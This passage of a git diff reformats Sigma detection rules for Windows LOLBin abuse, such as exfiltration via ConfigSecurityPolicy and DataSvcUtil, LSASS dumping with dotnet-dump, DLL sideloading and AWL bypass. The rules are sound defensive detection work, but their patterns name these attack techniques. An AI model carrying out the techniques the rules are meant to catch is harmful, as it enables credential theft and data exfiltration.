\cdb.exe + - OriginalFileName: CDB.Exe selection_cli: - CommandLine|contains: - - ' -c ' + CommandLine|contains: + - ' -c ' # Using a debugger script - ' -cf ' condition: process_creation and (all of selection*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml index 749e65eca..9cb89dc71 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml @@ -1,11 +1,10 @@ title: Custom Class Execution via Xwizard id: 53d4bb30-3f36-4e8a-b078-69d36c4a79ff status: test -description: Detects the execution of Xwizard tool with specific arguments which utilized - to run custom class properties. +description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. references: - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/07 modified: 2021/11/27 tags: @@ -19,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|re: \{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\} - NewProcessName|endswith: \xwizard.exe + CommandLine|re: \{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\} + NewProcessName|endswith: \xwizard.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml index 2011aa5d7..08af1a576 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmdl32.exe - - OriginalFileName: CMDL32.EXE + - NewProcessName|endswith: \cmdl32.exe + - OriginalFileName: CMDL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/vpn ' - '/lan ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml index a15afe560..e8554ecc0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml @@ -1,8 +1,7 @@ title: Suspicious ConfigSecurityPolicy Execution id: 1f0f6176-6482-4027-b151-00071af39d7e status: test -description: Upload file, credentials or data exfiltration with Binary part of Windows - Defender +description: Upload file, credentials or data exfiltration with Binary part of Windows Defender references: - https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/ author: frack113 @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security lolbas: - - CommandLine|contains: ConfigSecurityPolicy.exe - - NewProcessName|endswith: \ConfigSecurityPolicy.exe - - OriginalFileName: ConfigSecurityPolicy.exe + - CommandLine|contains: ConfigSecurityPolicy.exe + - NewProcessName|endswith: \ConfigSecurityPolicy.exe + - OriginalFileName: ConfigSecurityPolicy.exe remote: - CommandLine|contains: + CommandLine|contains: - https:// - http:// - ftp:// diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml index 3d5d1fc51..d5beb1a03 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml @@ -1,8 +1,7 @@ title: Suspicious CustomShellHost Execution id: 84b14121-9d14-416e-800b-f3b829c5a14d status: test -description: Detects the execution of CustomShellHost binary where the child isn't - located in 'C:\Windows\explorer.exe' +description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe' references: - https://github.com/LOLBAS-Project/LOLBAS/pull/180 - https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/ @@ -21,7 +20,7 @@ detection: selection: ParentProcessName|endswith: \CustomShellHost.exe filter: - NewProcessName: C:\Windows\explorer.exe + NewProcessName: C:\Windows\explorer.exe condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml index 8c26999f5..25697d859 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml @@ -22,13 +22,13 @@ detection: EventID: 4688 Channel: Security selection_cli: - CommandLine|contains: + CommandLine|contains: - '/in:' - '/out:' - '/uri:' selection_img: - - NewProcessName|endswith: \DataSvcUtil.exe - - OriginalFileName: DataSvcUtil.exe + - NewProcessName|endswith: \DataSvcUtil.exe + - OriginalFileName: DataSvcUtil.exe condition: process_creation and (all of selection*) fields: - SubjectUserName @@ -37,10 +37,7 @@ fields: - ParentCommandLine falsepositives: - DataSvcUtil.exe being used may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making - changes in your environment. - - DataSvcUtil.exe being executed from unfamiliar users should be investigated. - If known behavior is causing false positives, it can be exempted from the - rule. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml index dc2472298..6f7b6b621 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml @@ -20,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \dctask64.exe + NewProcessName|endswith: \dctask64.exe filter: - CommandLine|contains: DesktopCentral_Agent\agent + CommandLine|contains: DesktopCentral_Agent\agent condition: process_creation and (selection and not filter) fields: - ParentProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml index 6fc616f47..5297a10c9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml @@ -1,8 +1,7 @@ title: Lolbin Defaultpack.exe Use As Proxy id: b2309017-4235-44fe-b5af-b15363011957 status: test -description: Detect usage of the "defaultpack.exe" binary as a proxy to launch other - programs +description: Detect usage of the "defaultpack.exe" binary as a proxy to launch other programs references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/ - https://www.echotrail.io/insights/search/defaultpack.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml index 59b029aa7..f05ab0c9c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml @@ -1,8 +1,7 @@ title: DeviceCredentialDeployment Execution id: b8b1b304-a60f-4999-9a6e-c547bde03ffd status: test -description: Detects the execution of DeviceCredentialDeployment to hide a process - from view +description: Detects the execution of DeviceCredentialDeployment to hide a process from view references: - https://github.com/LOLBAS-Project/LOLBAS/pull/147 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \DeviceCredentialDeployment.exe + NewProcessName|endswith: \DeviceCredentialDeployment.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml index eff88fbf8..4fbbc9020 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: LaunchForDeploy - NewProcessName|endswith: \devtoolslauncher.exe + CommandLine|contains: LaunchForDeploy + NewProcessName|endswith: \devtoolslauncher.exe condition: process_creation and selection falsepositives: - Legitimate use of devtoolslauncher.exe by legitimate user diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml index b6d422bc7..a5af809c4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml @@ -1,8 +1,7 @@ title: Suspicious Diantz Alternate Data Stream Execution id: 6b369ced-4b1d-48f1-b427-fdc0de0790bd status: test -description: Compress target file into a cab file stored in the Alternate Data Stream - (ADS) of the target file. +description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. references: - https://lolbas-project.github.io/lolbas/Binaries/Diantz/ author: frack113 @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - diantz.exe - .cab - CommandLine|re: :[^\\] + CommandLine|re: :[^\\] condition: process_creation and selection falsepositives: - Very Possible diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml index e05eee5a5..2bbdd08ee 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml @@ -1,8 +1,7 @@ title: Suspicious Diantz Download and Compress Into a CAB File id: 185d7418-f250-42d0-b72e-0c8b70661e93 status: test -description: Download and compress a remote file and store it in a cab file on local - machine. +description: Download and compress a remote file and store it in a cab file on local machine. references: - https://lolbas-project.github.io/lolbas/Binaries/Diantz/ author: frack113 @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - diantz.exe - ' \\\\' - .cab diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml index 84deac96e..1948bd7f0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml @@ -1,8 +1,7 @@ title: Xwizard DLL Sideloading id: 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1 status: test -description: Detects the execution of Xwizard tool from the non-default directory - which can be used to sideload a custom xwizards.dll +description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll references: - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \xwizard.exe + NewProcessName|endswith: \xwizard.exe filter: - NewProcessName|startswith: C:\Windows\System32\ + NewProcessName|startswith: C:\Windows\System32\ condition: process_creation and (selection and not filter) falsepositives: - Windows installed on non-C drive diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dnx.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dnx.yml index b2f1ec9ef..f47ee6910 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dnx.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dnx.yml @@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \dnx.exe + NewProcessName|endswith: \dnx.exe condition: process_creation and selection falsepositives: - Legitimate use of dnx.exe by legitimate user diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml index 848f571b2..e8b8d6b7d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dotnet.exe - - OriginalFileName: .NET Host + - NewProcessName|endswith: \dotnet.exe + - OriginalFileName: .NET Host selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .dll - .csproj condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml index 82d8e6959..f6e258c0e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml @@ -1,8 +1,7 @@ title: Process Memory Dump Via Dotnet-Dump id: 53d8d3e1-ca33-4012-adf3-e05a4d652e34 status: experimental -description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution - could indicate potential process dumping of critical processes such as LSASS +description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS references: - https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect - https://twitter.com/bohops/status/1635288066909966338 @@ -19,14 +18,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dotnet-dump.exe - - OriginalFileName: dotnet-dump.dll + - NewProcessName|endswith: \dotnet-dump.exe + - OriginalFileName: dotnet-dump.dll selection_cli: - CommandLine|contains: collect + CommandLine|contains: collect condition: process_creation and (all of selection_*) falsepositives: - - Process dumping is the expected behavior of the tool. So false positives are - expected in legitimate usage. The PID/Process Name of the process being dumped - needs to be investigated + - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dump64.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dump64.yml index 8a06a0e88..ce7829abd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dump64.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dump64.yml @@ -1,8 +1,7 @@ title: Suspicious Dump64.exe Execution id: 129966c9-de17-4334-a123-8b58172e664d status: test -description: Detects when a user bypasses Defender by renaming a tool to dump64.exe - and placing it in a Visual Studio folder +description: Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder references: - https://twitter.com/mrd0x/status/1460597833917251595 author: Austin Songer @austinsonger, Florian Roth @@ -19,15 +18,14 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \dump64.exe + NewProcessName|endswith: \dump64.exe procdump_flags: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - accepteula filter: - NewProcessName|contains: \Installer\Feedback\dump64.exe - condition: process_creation and (( selection and not filter ) or ( selection and - procdump_flags )) + NewProcessName|contains: \Installer\Feedback\dump64.exe + condition: process_creation and (( selection and not filter ) or ( selection and procdump_flags )) falsepositives: - Dump64.exe in other folders than the excluded one level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_extexport.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_extexport.yml index 2220871c6..404e73995 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_extexport.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_extexport.yml @@ -1,8 +1,7 @@ title: Suspicious Extexport Execution id: fb0b815b-f5f6-4f50-970f-ffe21f253f7a status: test -description: Extexport.exe loads dll and is execute from other folder the original - path +description: Extexport.exe loads dll and is execute from other folder the original path references: - https://lolbas-project.github.io/lolbas/Binaries/Extexport/ author: frack113 @@ -19,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: Extexport.exe - - NewProcessName|endswith: \Extexport.exe - - OriginalFileName: extexport.exe + - CommandLine|contains: Extexport.exe + - NewProcessName|endswith: \Extexport.exe + - OriginalFileName: extexport.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml index ea81085eb..e79f78dc7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml @@ -18,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection_lolbas: - - CommandLine|contains: extrac32.exe - - NewProcessName|endswith: \extrac32.exe - - OriginalFileName: extrac32.exe + - CommandLine|contains: extrac32.exe + - NewProcessName|endswith: \extrac32.exe + - OriginalFileName: extrac32.exe selection_archive: - CommandLine|contains: .cab + CommandLine|contains: .cab selection_options: - CommandLine|contains: + CommandLine|contains: - /C - /Y - ' \\\\' diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml index 5bb46d379..9dc8b86de 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - extrac32.exe - .cab - CommandLine|re: :[^\\] + CommandLine|re: :[^\\] condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_format.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_format.yml index bd2fa062c..ea8c59825 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_format.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_format.yml @@ -1,9 +1,7 @@ title: Format.com FileSystem LOLBIN id: 9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60 status: test -description: Detects the execution of format.com with a suspicious filesystem selection - that could indicate a defense evasion activity in which format.com is used to - load malicious DLL files or other programs +description: Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs references: - https://twitter.com/0gtweet/status/1477925112561209344 - https://twitter.com/wdormann/status/1478011052130459653?s=20 @@ -19,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: '/fs:' - NewProcessName|endswith: \format.com + CommandLine|contains: '/fs:' + NewProcessName|endswith: \format.com filter: - CommandLine|contains: + CommandLine|contains: - /fs:FAT - /fs:exFAT - /fs:NTFS diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml index 8c79d9477..fc8f98916 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml @@ -1,8 +1,7 @@ title: Use of FSharp Interpreters id: b96b2031-7c17-4473-afe7-a30ce714db29 status: test -description: The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL - bypass and is listed in Microsoft recommended block rules. +description: The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules. references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \fsianycpu.exe - - OriginalFileName: fsianycpu.exe - - NewProcessName|endswith: \fsi.exe - - OriginalFileName: fsi.exe + - NewProcessName|endswith: \fsianycpu.exe + - OriginalFileName: fsianycpu.exe + - NewProcessName|endswith: \fsi.exe + - OriginalFileName: fsi.exe condition: process_creation and selection falsepositives: - Legitimate use by a software developer. diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ftp.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ftp.yml index 1d3294d2b..ab5a43001 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ftp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ftp.yml @@ -1,8 +1,7 @@ title: LOLBIN Execution Of The FTP.EXE Binary id: 06b401f4-107c-4ff9-947f-9ec1e7649f1e status: test -description: Detects execution of ftp.exe script execution with the "-s" or "/s" flag - and any child processes ran by ftp.exe +description: Detects execution of ftp.exe script execution with the "-s" or "/s" flag and any child processes ran by ftp.exe references: - https://lolbas-project.github.io/lolbas/Binaries/Ftp/ author: Victor Sergeev, oscd.community @@ -23,10 +22,10 @@ detection: selection_parent: ParentProcessName|endswith: \ftp.exe selection_ftp_img: - - NewProcessName|endswith: \ftp.exe - - OriginalFileName: ftp.exe + - NewProcessName|endswith: \ftp.exe + - OriginalFileName: ftp.exe selection_ftp_cli: - CommandLine|contains: + CommandLine|contains: - '-s:' - '/s:' condition: process_creation and (selection_parent or all of selection_ftp_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml index 9023653c7..b875ca9f1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml @@ -1,13 +1,12 @@ title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS id: 575dce0c-8139-4e30-9295-1ee75969f7fe related: - - id: f92a6f1e-a512-4a15-9735-da09e78d7273 - type: similar - - id: 07aa184a-870d-413d-893a-157f317f6f58 - type: similar + - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate + type: similar + - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp + type: similar status: test -description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". - Which can be used to gather information about the target machine +description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine references: - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government @@ -27,14 +26,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \cscript.exe - - \wscript.exe - - OriginalFileName: - - cscript.exe - - wscript.exe + - NewProcessName|endswith: + - \cscript.exe + - \wscript.exe + - OriginalFileName: + - cscript.exe + - wscript.exe selection_cli: - CommandLine|contains: gatherNetworkInfo.vbs + CommandLine|contains: gatherNetworkInfo.vbs condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml index 347444272..9a2f0aaf1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml @@ -1,8 +1,7 @@ title: Gpscript Execution id: 1e59c230-6670-45bf-83b0-98903780607e status: experimental -description: Detects the execution of the LOLBIN gpscript, which executes logon or - startup scripts configured in Group Policy +description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy references: - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ - https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \gpscript.exe - - OriginalFileName: GPSCRIPT.EXE + - NewProcessName|endswith: \gpscript.exe + - OriginalFileName: GPSCRIPT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /logon' - ' /startup' filter_main_svchost: diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml index 5a2274aa2..2b898bd45 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml @@ -1,8 +1,7 @@ title: Ie4uinit Lolbin Use From Invalid Path id: d3bf399f-b0cf-4250-8bb4-dfc192ab81dc status: test -description: Detect use of ie4uinit.exe to execute commands from a specially prepared - ie4uinit.inf file from a directory other than the usual directories +description: Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories references: - https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ @@ -20,17 +19,16 @@ detection: EventID: 4688 Channel: Security lolbin: - - NewProcessName|endswith: \ie4uinit.exe - - OriginalFileName: IE4UINIT.EXE + - NewProcessName|endswith: \ie4uinit.exe + - OriginalFileName: IE4UINIT.EXE filter_correct: CurrentDirectory: - c:\windows\system32\ - c:\windows\sysWOW64\ filter_missing: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (lolbin and not 1 of filter_*) falsepositives: - - ViberPC updater calls this binary with the following commandline "ie4uinit.exe - -ClearIconCache" + - ViberPC updater calls this binary with the following commandline "ie4uinit.exe -ClearIconCache" level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml index bbaf8ed19..8cf3b21e1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \ilasm.exe - - OriginalFileName: ilasm.exe + - NewProcessName|endswith: \ilasm.exe + - OriginalFileName: ilasm.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_jsc.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_jsc.yml index 13652dcce..96b48d455 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_jsc.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_jsc.yml @@ -1,8 +1,7 @@ title: JSC Convert Javascript To Executable id: 52788a70-f1da-40dd-8fbd-73b5865d6568 status: test -description: Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript - code to .exe or .dll format +description: Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format references: - https://lolbas-project.github.io/lolbas/Binaries/Jsc/ author: frack113 @@ -18,8 +17,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: .js - NewProcessName|endswith: \jsc.exe + CommandLine|contains: .js + NewProcessName|endswith: \jsc.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml index 3c4bd30e8..8e971ce8c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml @@ -1,9 +1,7 @@ title: Kavremover Dropped Binary LOLBIN Usage id: d047726b-c71c-4048-a99b-2e2f50dc107d status: test -description: Detects the execution of a signed binary dropped by Kaspersky Lab Products - Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands - and binaries. +description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. references: - https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea author: Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' run run-cmd ' + CommandLine|contains: ' run run-cmd ' filter: ParentProcessName|endswith: - - \kavremover.exe - - \cleanapi.exe + - \kavremover.exe # When launched from kavremover.exe + - \cleanapi.exe # When launched from KES installer condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml index fa7b697ba..2ed4fa8b6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml @@ -1,8 +1,7 @@ title: Launch-VsDevShell.PS1 Proxy Execution id: 45d3a03d-f441-458c-8883-df101a3bb146 status: test -description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script - to execute commands. +description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. references: - https://twitter.com/nas_bench/status/1535981653239255040 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,9 +17,9 @@ detection: EventID: 4688 Channel: Security selection_script: - CommandLine|contains: Launch-VsDevShell.ps1 + CommandLine|contains: Launch-VsDevShell.ps1 selection_flags: - 